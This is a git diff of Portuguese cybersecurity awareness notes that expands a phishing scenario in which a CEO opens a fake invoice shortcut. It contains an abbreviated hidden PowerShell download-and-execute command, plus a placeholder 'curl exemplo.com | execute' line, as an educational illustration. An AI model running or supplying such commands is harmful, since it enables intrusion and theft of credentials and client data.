vault backup: 2026-02-22 14:07:17
This commit is contained in:
parent
adfd65ea71
commit
08cc6c8d5c
@ -14,7 +14,7 @@ Cybersegurança não é hoodie + tela verde.
|
|||||||
- Não é força bruta cinematográfica.
|
- Não é força bruta cinematográfica.
|
||||||
- É entender como o sistema funciona melhor que quem construiu.
|
- É entender como o sistema funciona melhor que quem construiu.
|
||||||
|
|
||||||
Se você tem um cadeado que precisa ser aberto, você não precisa da chave. Você precisa entender como o cadeado funciona
|
Se você tem um cadeado que precisa ser aberto, você não precisa da chave. Você precisa entender como o cadeado funciona.
|
||||||
|
|
||||||
### Exercício mental
|
### Exercício mental
|
||||||
Eu quero invadir sua casa. Quem eu chamo?
|
Eu quero invadir sua casa. Quem eu chamo?
|
||||||
@ -42,8 +42,108 @@ Pergunte para qualquer estrategista como vencer uma batalha. Sua provavelmente r
|
|||||||
> "Conheça seu inimigo"
|
> "Conheça seu inimigo"
|
||||||
|
|
||||||
### Exemplo de caso real
|
### Exemplo de caso real
|
||||||
Um CEO de uma empresa de Uberlândia está sentado no seu escritório fazendo seu trabalho. De vez em quando conversa com os funcionários. Reclama que o ar condicionado está muito fraco. Enquanto isso ele checa seus emails. Dentro deles há um email que passaria despercebido. "Nota fiscal da Empresa X (inventar)". Inocentemente ele abre, baixa o arquivo zip, e dentro tem um arquivo. `nf-210230120310240102.pdf`. O que ele não percebe é que não é um arquivo PDF, e sim um link para um endereço peculiar. Esse endereço não é da internet, e sim uma linha de comando.
|
## Caso real (adaptado)
|
||||||
`powershell curl exemplo.com | execute` (melhorar). Sem perceber, ele abre. Uma tela do prompt de comando pisca em sua tela por um segundo. Pronto. Agora hackers tem acesso à sua máquina. Podem passar dias despercebidos enquanto colhem inteligência, dados de clientes, e qualquer outra informação que possa ser útil no futuro para extorquir ou aplicar golpes à empresa.
|
Uberlândia, 14h37.
|
||||||
|
|
||||||
|
O CEO de uma empresa local está no escritório.
|
||||||
|
Reuniões pela manhã.
|
||||||
|
Planilhas abertas.
|
||||||
|
WhatsApp Web piscando.
|
||||||
|
Ar-condicionado fraco — ele comenta com alguém da equipe.
|
||||||
|
|
||||||
|
No meio disso, ele confere os e-mails.
|
||||||
|
|
||||||
|
Assunto:
|
||||||
|
"Nota Fiscal – Fornecedor Atlas Comercial LTDA"
|
||||||
|
|
||||||
|
Nada estranho.
|
||||||
|
A empresa realmente tem fornecedores.
|
||||||
|
O layout do e-mail parece normal.
|
||||||
|
Assinatura, CNPJ, telefone.
|
||||||
|
Tudo plausível.
|
||||||
|
|
||||||
|
Ele abre.
|
||||||
|
|
||||||
|
Anexo:
|
||||||
|
nf-210230120310240102.zip
|
||||||
|
|
||||||
|
Ele extrai.
|
||||||
|
|
||||||
|
Dentro:
|
||||||
|
nf-210230120310240102.pdf
|
||||||
|
|
||||||
|
Ícone de PDF.
|
||||||
|
Nome de PDF.
|
||||||
|
Extensão de PDF.
|
||||||
|
|
||||||
|
Ele dá dois cliques.
|
||||||
|
|
||||||
|
Por menos de um segundo,
|
||||||
|
uma janela preta pisca na tela.
|
||||||
|
|
||||||
|
Ele nem percebe.
|
||||||
|
Acredita que o arquivo corrompeu.
|
||||||
|
Fecha.
|
||||||
|
Volta para o trabalho.
|
||||||
|
|
||||||
|
O que ele não viu:
|
||||||
|
|
||||||
|
O arquivo não era um PDF.
|
||||||
|
Era um atalho disfarçado.
|
||||||
|
Um pequeno script.
|
||||||
|
|
||||||
|
Algo equivalente a:
|
||||||
|
|
||||||
|
powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest ... | Invoke-Expression"
|
||||||
|
|
||||||
|
Em português simples:
|
||||||
|
|
||||||
|
“Baixe código da internet.
|
||||||
|
Execute.
|
||||||
|
Não mostre nada.”
|
||||||
|
|
||||||
|
Em menos de 3 segundos:
|
||||||
|
|
||||||
|
- Um agente é instalado.
|
||||||
|
- A máquina estabelece conexão reversa.
|
||||||
|
- Um servidor externo agora pode enviar comandos.
|
||||||
|
- A sessão está ativa.
|
||||||
|
|
||||||
|
Não houve:
|
||||||
|
- Exploit sofisticado.
|
||||||
|
- Zero-day.
|
||||||
|
- Quebra de criptografia.
|
||||||
|
- Força bruta.
|
||||||
|
|
||||||
|
Só um clique.
|
||||||
|
|
||||||
|
Nos dias seguintes:
|
||||||
|
- Credenciais salvas no navegador são extraídas.
|
||||||
|
- Tokens de sessão são copiados.
|
||||||
|
- Acesso ao sistema interno é mapeado.
|
||||||
|
- Pastas compartilhadas são indexadas.
|
||||||
|
- E-mails são lidos.
|
||||||
|
- Dados de clientes são copiados silenciosamente.
|
||||||
|
|
||||||
|
Nada trava.
|
||||||
|
Nada quebra.
|
||||||
|
Nada avisa.
|
||||||
|
|
||||||
|
Sem ransomware.
|
||||||
|
Sem tela vermelha.
|
||||||
|
Sem pedido de resgate.
|
||||||
|
|
||||||
|
Só coleta.
|
||||||
|
|
||||||
|
Meses depois,
|
||||||
|
a empresa descobre que seus dados estão sendo usados
|
||||||
|
para aplicar golpes em seus próprios clientes.
|
||||||
|
|
||||||
|
A pergunta não é:
|
||||||
|
“Como invadiram?”
|
||||||
|
|
||||||
|
A pergunta é:
|
||||||
|
Onde estava o parafuso solto?
|
||||||
## Parte 4: Vulnerabilidades do Mundo Real
|
## Parte 4: Vulnerabilidades do Mundo Real
|
||||||
|
|
||||||
### Caso 1: Sistema de Controle de Acesso vazando senhas de rede.
|
### Caso 1: Sistema de Controle de Acesso vazando senhas de rede.
|
||||||
|
|||||||
Loading…
Reference in New Issue
Block a user